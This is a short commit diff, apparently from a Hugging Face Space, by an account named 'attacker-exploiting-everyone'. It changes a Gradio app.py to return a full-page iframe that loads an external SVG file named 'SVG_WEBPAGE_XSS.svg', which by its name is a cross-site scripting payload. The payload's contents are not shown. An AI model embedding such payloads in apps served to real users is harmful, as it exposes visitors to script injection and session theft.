attacker-exploiting-everyone commited on
Commit
1cecc78
·
verified ·
1 Parent(s): 330d3ad

Update app.py

Browse files
Files changed (1) hide show
  1. app.py +1 -1
app.py CHANGED
@@ -3,7 +3,7 @@ import gradio as gr
3
  def greet():
4
  # Inject iframe to load the page and fill 100% of the page
5
  iframe_code = '''
6
- <iframe src="https://attacker-exploiting-everyone-testingspace.static.hf.space/index.html"
7
  style="width: 100%; height: 100vh; border: none;"></iframe>
8
  '''
9
  return iframe_code
 
3
  def greet():
4
  # Inject iframe to load the page and fill 100% of the page
5
  iframe_code = '''
6
+ <iframe src="https://images.ctfassets.net/h0jtq0wdx190/3HivOdbWvD7QCDXEd53fx0/484ffd97340457cd7f1b954be06b5432/SVG_WEBPAGE_XSS.svg"
7
  style="width: 100%; height: 100vh; border: none;"></iframe>
8
  '''
9
  return iframe_code